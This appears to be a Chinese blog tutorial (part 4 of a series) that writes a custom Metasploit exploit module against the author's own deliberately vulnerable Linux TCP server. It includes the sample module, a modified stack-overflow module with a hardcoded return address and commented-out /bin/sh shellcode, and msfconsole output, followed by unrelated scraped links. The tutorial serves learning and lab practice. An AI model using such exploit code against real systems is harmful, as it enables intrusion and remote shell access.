有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits

root@bt:~/.msf4/modules# cd exploits

root@bt:~/.msf4/modules/exploits# mkdir linux

root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb

root@bt:~/.msf4/modules/exploits/linux# ls

myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##

# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

module Msf

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Exploits::Sample < Msf::Exploit::Remote

        #

        # This exploit affects TCP servers, so we use the TCP client mixin.

        #

        include Exploit::Remote::Tcp

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Sample exploit',

                        'Description'    => %q{

                                        This exploit module illustrates how a vu

lnerability could be exploited

                                in an TCP server that has a parsing bug.

                        },

                        'Author'         => 'skape',

                        'Version'        => '$Revision: 9212 $',

                        'References'     =>

                                [

                                ],

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                },

                        'Targets'        =>

                                [

                                        # Target 0: Windows All

                                        [

                                                'Windows Universal',

                                                {

                                                        'Platform' => 'win',

                                                        'Ret'      => 0x41424344

                                                }

                                        ],

                                ],

                        'DefaultTarget' => 0))

        end

        #

        # The sample exploit just indicates that the remote host is always

        # vulnerable.

        #

        def check

                return Exploit::CheckCode::Vulnerable

        end

        #

        # The exploit method connects to the remote service and sends 1024 A's

        # followed by the fake return address and then the payload.

        #

        def exploit

                connect

                print_status("Sending #{payload.encoded.length} byte payload..."

)

                # Build the buffer for transmission

                buf  = "A" * 1024

                buf += [ target.ret ].pack('V')

                buf += payload.encoded

                # Send it off

                sock.put(buf)

                sock.get

                handler

        end

end

end

然后我们需要把他添加进metasploit,运行reload_all

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##

# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #

    # This exploit affects TCP servers, so we use the TCP client mixin.

    #

    include Exploit::Remote::Tcp

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'MyVictimSever',

            'Description'    => %q{

                    This exploit module illustrates how a vulnerability could be exploited

                in an TCP server that has a stackoverflow bug.

            },

            'Author'         => 'bai',

            'Version'        => '$Revision: 9212 $',

            'References'     =>

                [

                ],

            'Payload'        =>

                {

                    'Space'    => 116, #

                    'BadChars' => "\x00",

                },

            'Targets'        =>

                [

                    # Target 0: Windows All

                    [

                        'MyVictimSever run on linux',

                        {

                            'Platform' => 'Linux',

                            'Ret'      =>  0xbffff4a4

                        }

                    ],

                ],

            'DefaultTarget' => 0))

    end

    #

    # The sample exploit just indicates that the remote host is always

    # vulnerable.

    #

    def check

        return Exploit::CheckCode::Vulnerable

    end

    #

    # The exploit method connects to the remote service and sends 1024 A's

    # followed by the fake return address and then the payload.

    #

    def exploit

        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission

        buf="";

        #buf  = "\x90" * 15

        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";

        buf+="\xa4\xf4\xff\xbf"

        buf += payload.encoded

        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off

        sock.put(buf)

        sock.get

        handler

    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my

use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim

use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver

msf > use exploit/linux/my

使用metasploit进行栈溢出攻击-4的更多相关文章

  1. 使用metasploit进行栈溢出攻击-1

    攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行. 首先,需要搞明白什么是栈溢出攻击,详细内容请阅读 http://blog.csdn.net/cnctloveyu/article/det ...

  2. 使用metasploit进行栈溢出攻击-2

    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成. 利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证. 先说一下如何生成 ...

  3. 使用metasploit进行栈溢出攻击-3

    有了shellcode,就可以进行攻击了,但是要有漏洞才行,真实世界中的漏洞很复杂,并且很难发现,因此我专门做一个漏洞来进行攻击. 具体来说就是做一个简单的tcp server,里面包含明显的栈溢出漏 ...

  4. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  5. [转]现代Linux系统上的栈溢出攻击

    1. 基本内容 这个教程试着向读者展示最基本的栈溢出攻击和现代Linux发行版中针对这种攻击的防御机制.为此我选择了最新版本的Ubuntu系统(12.10),因为它默认集成了几个安全防御机制,而且它也 ...

  6. Linux下基本栈溢出攻击【转】

    转自:http://blog.csdn.net/wangxiaolong_china/article/details/6844415 版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[ ...

  7. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  8. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  9. 实验三 kali下metasploit的漏洞攻击实践

    一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用 ...

随机推荐

  1. 【全面解禁!真正的Expression Blend实战开发技巧】第六章 认识ListBox

    反反复复考虑后,准备把这一章的切入点瞄准ListBox.并用了一个看起来有点别扭的标题“认识ListBox",许多人看到这里就不爱看了,即使是大学里用winform的学生也会说ListBox ...

  2. 洛谷【AT2827】LIS

    浅谈\(DP\):https://www.cnblogs.com/AKMer/p/10437525.html 题目传送门:https://www.luogu.org/problemnew/show/A ...

  3. resize2fs: Bad magic number in super-block while trying to open /dev/centos/root Couldn't find valid filesystem superblock

    今天在进行lvm扩容之后,按照惯例进行 resize2fs 操作,发现报如下错误: # resize2fs /dev/centos/root resize2fs 1.42.9 (28-Dec-2013 ...

  4. SpringBoot自动化配置之四:SpringBoot 之Starter(自动配置)、Command-line runners

    Spring Boot Starter是在SpringBoot组件中被提出来的一种概念,stackoverflow上面已经有人概括了这个starter是什么东西,想看完整的回答戳这里 Starter ...

  5. 网络监控之一:ss(Socket Statistics)

    ss是Socket Statistics的缩写. 顾名思义,ss命令可以用来获取socket统计信息,它可以显示和netstat类似的内容.但ss的优势在于它能够显示更多更详细的有关TCP和连接状态的 ...

  6. Byte和byte[]数组

    Byte和byte[]数组,“表示一个 8 位无符号整数, 一般为8位二进制数”. Byte是计算机最基础的存储单位和最基础的通讯单位. 而所有的类型都是支持由byte[]类型转换而来. 为什么说By ...

  7. java 多线程系列基础篇(七)之线程休眠

    1. sleep()介绍 sleep() 定义在Thread.java中.sleep() 的作用是让当前线程休眠,即当前线程会从“运行状态”进入到“休眠(阻塞)状态”.sleep()会指定休眠时间,线 ...

  8. numpy.percentile

    http://docs.scipy.org/doc/numpy/reference/generated/numpy.percentile.html numpy.percentile(a, q, axi ...

  9. 监控和安全运维 1.4 nagios安装

    1. Nagios 简介是一个开源软件,可以监控网络设备网络流量.Linux/windows主机状态,甚至可以监控打印机它可以运行在Linux上或windows上基于浏览器的web界面方便运维人员查看 ...

  10. [Python Study Notes]pynput实现对键盘控制与监控

    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ...